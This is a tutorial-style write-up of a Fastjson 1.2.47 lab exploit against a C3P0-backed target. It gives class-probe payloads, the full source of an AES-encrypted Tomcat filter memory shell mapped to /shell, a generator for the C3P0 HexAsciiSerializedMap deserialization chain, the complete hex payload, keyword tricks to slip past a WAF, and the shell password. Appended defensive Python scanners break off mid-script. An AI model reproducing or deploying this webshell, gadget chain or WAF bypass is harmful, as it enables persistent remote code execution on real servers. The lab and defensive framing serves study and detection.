True unfreedom is the cage one builds inside one's own heart.

fastjson vulnerability reproduction - 1247 - waf - c3p0

Exploit

Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md

The goal here is to reproduce the whole process in order to understand the exploit flow. Many write-ups by experienced researchers are well written, but they skip the basics a beginner needs (how to compile the Java files in IDEA, how to resolve dependencies, and so on), so I am documenting my own reproduction process.

Capture the login packet


{
  "@type": "java.lang.AutoCloseable"


1.2.47 has a mappings cache bypass that can be exploited through JNDI, with the following conditions for JNDI exploitation:

  1. Generally requires an external network environment
  2. Subject to JDK version restrictions

This environment does not have external network access, so JNDI exploitation is not possible.

For this environment, therefore, we first need to probe which dependencies are present. By triggering a java.lang.Character type-conversion error, the error response tells us whether the class named in the payload exists on the classpath.

{
  "x": {
    "@type": "java.lang.Character"{
      "@type": "java.lang.Class",
      "val": "org.springframework.web.bind.annotation.RequestMapping"
    }
  }


RequestMapping is a Spring class, so when it is present a type-conversion error is thrown, which indicates a Spring Boot project. If the class is absent, no such error is returned.


After testing, the service has a C3P0 dependency.

{
  "x": {
    "@type": "java.lang.Character"{
      "@type": "java.lang.Class",
      "val": "com.mchange.v2.c3p0.DataSources"
    }
  }


FastJson combined with C3P0 offers several exploitation methods. The most commonly cited one that needs no outbound network access is the hex-encoded second-order deserialization via userOverridesAsString (HexAsciiSerializedMap), which is used here to inject a memory shell.

Find a filter-type memory shell; the Java file content is as follows:

import com.sun.org.apache.xalan.internal.xsltc.DOM;  
import com.sun.org.apache.xalan.internal.xsltc.TransletException;  
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;  
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;  
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;  
import org.apache.catalina.Context;  
import org.apache.catalina.core.ApplicationFilterConfig;  
import org.apache.catalina.core.StandardContext;  
import org.apache.catalina.loader.WebappClassLoaderBase;  
import org.apache.tomcat.util.descriptor.web.FilterDef;  
import org.apache.tomcat.util.descriptor.web.FilterMap;  
import sun.misc.BASE64Decoder;  
  
import javax.crypto.Cipher;  
import javax.crypto.spec.SecretKeySpec;  
import javax.servlet.*;  
import javax.servlet.http.HttpServletRequest;  
import javax.servlet.http.HttpServletResponse;  
import javax.servlet.http.HttpSession;  
import java.io.IOException;  
import java.lang.reflect.Constructor;  
import java.lang.reflect.Field;  
import java.lang.reflect.Method;  
import java.util.Base64;  
import java.util.HashMap;  
import java.util.Map;  
  
public class IceShell extends AbstractTranslet implements Filter {  
    private final String pa = "3ad2fddfe8bad8e6";  
  
    public IceShell() {  
    }  
  
    public void init(FilterConfig filterConfig) throws ServletException {  
    }  
  
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {  
        HttpServletRequest request = (HttpServletRequest)servletRequest;  
        HttpServletResponse response = (HttpServletResponse)servletResponse;  
        HttpSession session = request.getSession();  
        Map<String, Object> pageContext = new HashMap();  
        pageContext.put("session", session);  
        pageContext.put("request", request);  
        pageContext.put("response", response);  
        ClassLoader cl = Thread.currentThread().getContextClassLoader();  
        if (request.getMethod().equals("POST")) {  
            Class Lclass;  
            if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            } else {  
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();  
                this.RushThere(Lclass, cl, session, request, pageContext);  
            }  
  
            filterChain.doFilter(servletRequest, servletResponse);  
        }  
    }  
  
    public void destroy() {  
    }  
  
    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {  
        byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");  
  
        try {  
            Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);  
            define.setAccessible(true);  
            Class uclass = null;  
  
            try {  
                uclass = cl.loadClass("U");  
            } catch (ClassNotFoundException var18) {  
                uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);  
            }  
  
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);  
            constructor.setAccessible(true);  
            Object u = constructor.newInstance(this.getClass().getClassLoader());  
            Method Um = uclass.getDeclaredMethod("g", byte[].class);  
            Um.setAccessible(true);  
            String k = "3ad2fddfe8bad8e6";  
            session.setAttribute("u", k);  
            Cipher c = Cipher.getInstance("AES");  
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));  
            byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));  
            Class eclass = (Class)Um.invoke(u, eClassBytes);  
            Object a = eclass.newInstance();  
            Method b = eclass.getDeclaredMethod("equals", Object.class);  
            b.setAccessible(true);  
            b.invoke(a, pageContext);  
        } catch (Exception var19) {  
        }  
    }  
  
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {  
    }  
  
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {  
    }  
  
    static {  
        try {  
            String name = "AutomneGreet";  
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();  
            StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();  
            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");  
            Configs.setAccessible(true);  
            Map filterConfigs = (Map)Configs.get(standardContext);  
            if (filterConfigs.get("AutomneGreet") == null) {  
                Filter filter = new IceShell();  
                FilterDef filterDef = new FilterDef();  
                filterDef.setFilter(filter);  
                filterDef.setFilterName("AutomneGreet");  
                filterDef.setFilterClass(filter.getClass().getName());  
                standardContext.addFilterDef(filterDef);  
                FilterMap filterMap = new FilterMap();  
                filterMap.addURLPattern("/shell");  
                filterMap.setFilterName("AutomneGreet");  
                filterMap.setDispatcher(DispatcherType.REQUEST.name());  
                standardContext.addFilterMapBefore(filterMap);  
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);  
                constructor.setAccessible(true);  
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);  
                filterConfigs.put("AutomneGreet", filterConfig);  
            }  
        } catch (Exception var10) {  
        }  
    }  
}

Compile to generate the class file.

Normally you could compile with javac IceShell.java, but that throws a pile of errors because of the missing dependencies. Instead, compile it in IDEA, which produces IceShell.class; see the Java File Compilation section below for the steps.

The above IceShell file is a memory shell, and next, we need the C3P0 deserialization chain.

The final content of the C3P0 chain is as follows:

import com.alibaba.fastjson.JSONArray;  
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;  
  
import javax.management.BadAttributeValueExpException;  
import java.io.ByteArrayOutputStream;  
import java.io.IOException;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
import java.util.HashMap;  
  
public class Test {  
    public static void main(String[] args) throws Exception {  
        String hex2 = bytesToHex(tobyteArray(gen()));  
        String FJ1247 = "{\n" +  
                "    \"a\":{\n" +  
                "        \"@type\":\"java.lang.Class\",\n" +  
                "        \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +  
                "    },\n" +  
                "    \"b\":{\n" +  
                "        \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +  
                "        \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +  
                "    }\n" +  
                "}\n";  
        System.out.println(FJ1247);  
    }  
    // FastJson native deserialization loads malicious class bytecode  
    public static Object gen() throws Exception {  
        TemplatesImpl templates = TemplatesImpl.class.newInstance();  
        byte[] bytes = Files.readAllBytes(Paths.get("/Users/xxx/pentesting/javasec/FRain/out/production/FRain/IceShell.class")); // Read the bytecode of the previously created memory shell  
        setValue(templates, "_bytecodes", new byte[][]{bytes});  
        setValue(templates, "_name", "1");  
        setValue(templates, "_tfactory", null);  
  
        JSONArray jsonArray = new JSONArray();  
        jsonArray.add(templates);  
  
        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);  
        setValue(bd,"val",jsonArray);  
  
        HashMap hashMap = new HashMap();  
        hashMap.put(templates,bd);  
        return hashMap;  
    }  
    public static void setValue(Object obj, String name, Object value) throws Exception{  
        Field field = obj.getClass().getDeclaredField(name);  
        field.setAccessible(true);  
        field.set(obj, value);  
    }  
  
    // Serialize the class to a byte array  
    public static byte[] tobyteArray(Object o) throws IOException {  
        ByteArrayOutputStream bao = new ByteArrayOutputStream();  
        ObjectOutputStream oos = new ObjectOutputStream(bao);  
        oos.writeObject(o);  
        return bao.toByteArray();  
    }  
  
    // Convert byte array to hexadecimal  
    public static String bytesToHex(byte[] bytes) {  
        StringBuffer stringBuffer = new StringBuffer();  
        for (int i = 0; i < bytes.length; i++) {  
            String hex = Integer.toHexString(bytes[i] & 0xff);      // Java bytes are signed (-128~127); & 0xff maps them to 0~255  
            if (hex.length()<2){  
                stringBuffer.append("0" + hex);   // Values below 0x10 need a leading '0' so every byte is exactly 2 hex digits  
            }else {  
                stringBuffer.append(hex);  
            }  
        }  
        return stringBuffer.toString();  
    }  
}

Similarly, create a Test.java file in src, resolve dependency issues in the same way, and then right-click to run this file.


The output is the final payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "b":{
        "@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000024dccafebabe0000003401870a005e00cb0800cc09004b00cd0700ce0700cf0b000400d00700d10a000700cb08007e0b004900d208007a08007c0a00d300d40a00d300d50b000400d60800d70a00d800d90a002400da0a001c00db0a001c00dc0800dd0a004b00de0b00df00e00a00e100e20800e30a00e400e50800e60700e70700a30900e800e90a001c00ea0a00eb00ec0800ed0a002700ee0700ef0700f00a00e800f10a00eb00f20700f30a001c00f40a00f500ec0a001c00f60a00f500f70800f808009c0b00f900fa0800fb0a00fc00fd0700fe0a00d800ff0a003101000a00fc01010701020a003500cb0b000401030a010401050a003501060a00fc01070a001c010808010907010a08010b07010c0a003f010d0b010e010f0701100801110a001c01120800c80a001c01130a011400ec0a011401150701160b004901150701170a004b00cb0701180a004d00cb0a004d01190a004d011a0a004d011b0a0042011c07011d0a005300cb08011e0a0053011f0a0053011a09012001210a012001220a005301230a0042012407012507012607012707012801000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000a4c4963655368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742
f46696c746572436f6e6669673b01000a457863657074696f6e73070129010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001b4c6a617661782f736572766c65742f46696c746572436861696e3b010007726571756573740100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73653b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c6507011707012a07012b07012c0700ce0700cf07012d0701160700f30700e707012e01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a617661782f736572766c65742f46696c746572436861696e3b295601000576617231380100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015301540c015501560100156a6176612f6c616e672f436c6173734c6f616465720c015701580701590c015a01390c015b015c0100016707012d0c015d015e01000341455307015f0c0160016101001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016201630c006301640c006a016501001673756e2f6d6973632f4241534536344465636f6465720c016601670701680c0169013b0
c016a014a0c016b016c0c015b016d010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016e016f0701700c017101720100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017301520c017401750701760c0177017801000d6a6176612f7574696c2f4d61700100084963655368656c6c01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c0179017a0c017b017c0c017d017c0c017e017f01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100062f7368656c6c0c0180017c0701810c018201830c00c1013b0c0184017c0c018501860100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e745468726561640
1001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616
e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f537472696e673b294c6a6176612f7265666c6563742f4669656c643b0100176a6176612f7265666c6563742f4669656c64010003676574010026284c6a6176612f4f626a6563743b294c6a6176612f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021004b005e0001005f0001001200600061000100620000000200020008000100630064000100650000003d000200010000000b2ab700012a1202b50003b10000000200660000000e00030000001f0004001d000a002000670000000c00010000000b0068006900000001006a006b00020065000000350000000200000001b100000002006600000006000100000023006700000
01600020000000100680069000000000001006c006d0001006e000000040001006f00010070007100020065000003180006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000072001c0000002600060027000c002800150029001e002a002a002b0036002c0042002d004a002e00590030006c00310076003200870033009d003400aa003500bb003600d4003700e4003800f500390111003a0124003b0135003c0154003d016a003e017b00400194004101a2004401aa0047006700000098000f0076001100720073000900aa001100720073000900e4001100720073000901240011007200730009016a001100720073000901940016007200730009000001ab006800690000000001ab007400750001000001ab007600770002000001ab007800790003000601a5007a007b0004000c019f007c007d000500150196007e007f0006001e018d008000810007004a016100820083000800840000000c0001001e018d0080008500070086000000330007ff0087000907008707008807008907008a07008b07008c07008d07008e07008f000033393ffb0045fc0026070090fa0007006e0000000600020091006f000100920064000100650000002b0000000100000001b10000000200660000000600010000006f0067000000200003000000010068006900000000000100af00b000010000000100b100b20002006e00000004000100b3000100ad00b400020065000000490000000400000001b10000000200660000000600010000007200670000002a0004000000010068006900000000000100af00b000010000000100b500b600020000000100b700b80003006e00000004000100b3000800b9006400010065000001da0005000a000000de123e4bb8000db6000ec0003f4
c2bb60040b900410100c000424d1243b800441245b600464e2d04b600472d2cb60048c000493a041904123eb9004a0200c7009cbb004b59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123eb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123eb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123e1909b9000a030057a700044bb10001000000d900dc003d000300660000006600190000007600030077000d0078001a00790025007a002a007b0034007c0040007d0049007e0052007f0059008000600081006d008200730083007c008400830085008a008600950087009b008800b0008900b6008a00cd008b00d9008e00dc008d00dd0090006700000066000a0049009000ba00bb00050052008700bc00bd0006007c005d00be00bf000700b00029009a009b000800cd000c006c00c00009000300d600c100610000000d00cc00c200c30001001a00bf00c400c50002002500b400c600c70003003400a500c80081000400860000000a0003fb00d9420700aa00000200c90000000200ca01460000000a000100e400e101450009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007
e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;
    }
}

With the above content, exploitation can proceed.
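As an added defender-side example (not part of this write-up or the FastJsonParty project), the following Python script inspects a captured userOverridesAsString value of the kind shown above: it strips the HexAsciiSerializedMap: prefix, decodes the hex, checks for the Java serialization stream magic aced0005, and walks the stream for TC_CLASSDESC entries to list the class names the object graph carries, flagging the gadget classes named in this write-up (TemplatesImpl, BadAttributeValueExpException, JSONArray). The descriptor walk is a heuristic scan, not a full Java serialization parser; the sample value is the first bytes of the payload above, truncated after the TemplatesImpl descriptor.

```python
import re

# Java serialization constants (java.io.ObjectStreamConstants)
STREAM_MAGIC = bytes.fromhex("aced0005")
TC_CLASSDESC = 0x72
# A TC_CLASSDESC is only expected right after one of these tags:
# TC_OBJECT (0x73), TC_ARRAY (0x75), TC_CLASS (0x76) or TC_ENDBLOCKDATA (0x78, superclass slot)
DESC_PRECEDERS = {0x73, 0x75, 0x76, 0x78}
# Class names are ASCII: optional array prefix, dotted identifier, optional ';' for "[L...;" forms
CLASSNAME = re.compile(r"^\[*[A-Za-z_$][\w$.;]*$")

# Gadget classes that appear in the chain described in this write-up
GADGET_CLASSES = {
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "javax.management.BadAttributeValueExpException",
    "com.alibaba.fastjson.JSONArray",
}

PREFIX = "HexAsciiSerializedMap:"


def decode_hex_ascii_serialized_map(value: str) -> bytes:
    """Turn a userOverridesAsString value into the raw bytes c3p0 would deserialize."""
    if not value.startswith(PREFIX):
        raise ValueError("not a HexAsciiSerializedMap value")
    hexdata = value[len(PREFIX):].strip().rstrip(";")
    return bytes.fromhex(hexdata)


def extract_class_names(stream: bytes) -> list:
    """Heuristically list class descriptors (TC_CLASSDESC + length-prefixed UTF name)."""
    if not stream.startswith(STREAM_MAGIC):
        return []
    names = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC and stream[i - 1] in DESC_PRECEDERS:
            length = int.from_bytes(stream[i + 1:i + 3], "big")
            raw = stream[i + 3:i + 3 + length]
            name = raw.decode("ascii", errors="replace") if len(raw) == length else ""
            if name and CLASSNAME.match(name):
                names.append(name)
                i += 3 + length  # skip the name bytes so they are not re-scanned
                continue
        i += 1
    return names


def assess(value: str) -> dict:
    """Summarize a captured value: is it a Java stream, which classes, which known gadgets."""
    stream = decode_hex_ascii_serialized_map(value)
    names = extract_class_names(stream)
    return {
        "java_serialized": stream.startswith(STREAM_MAGIC),
        "classes": names,
        "gadget_hits": [n for n in names if n in GADGET_CLASSES],
    }


# Sample input: the first bytes of the payload shown in this write-up, truncated after
# the TemplatesImpl class descriptor (enough for the scanner to see two descriptors).
SAMPLE_VALUE = (
    "HexAsciiSerializedMap:"
    "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d1030002"
    "46000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77"
    "0800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c61"
    "6e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c;"
)

if __name__ == "__main__":
    print(assess(SAMPLE_VALUE))
```

Run against the full payload above, the same scan lists every class in the HashMap, TemplatesImpl, BadAttributeValueExpException and JSONArray graph, which is what a responder wants from a captured request before the bytes are ever handed to ObjectInputStream.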

Sending the packet directly gets blocked: the WAF filters the keyword userOverridesAsString. Bypass attempts with unicode and hex encoding also fail, because this environment filters the encoding prefixes \u and \x as well.


Inserting _ or + into the keyword gets past the filter; see A Brief Discussion on Fastjson Bypassing WAF.


Successfully injected the IceShell memory shell, with the password: goautomne.
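As an added defender-side example (not from this write-up or the referenced article), here is a Python request-body check that closes the two gaps the bypasses above exploited: it resolves \u and \x escapes before matching, and it compares key names only after stripping every non-alphanumeric character and case. That normalization is a superset of Fastjson's smart matching (which ignores _ and - in field names) and makes no claim about which characters Fastjson actually tolerates, so user_Overrides_As_String and the escaped forms are caught alongside the plain keyword. It also flags the @type probe classes used earlier in the write-up. The signature lists and sample bodies are constructed for the example; the key/value tokenizer is regex-based on purpose so the deliberately malformed probe payloads still get scanned.

```python
import re

# Signatures taken from this write-up: the probe types and the C3P0 gadget entry point.
SUSPICIOUS_TYPES = {
    "java.lang.autocloseable",
    "java.lang.character",
    "java.lang.class",
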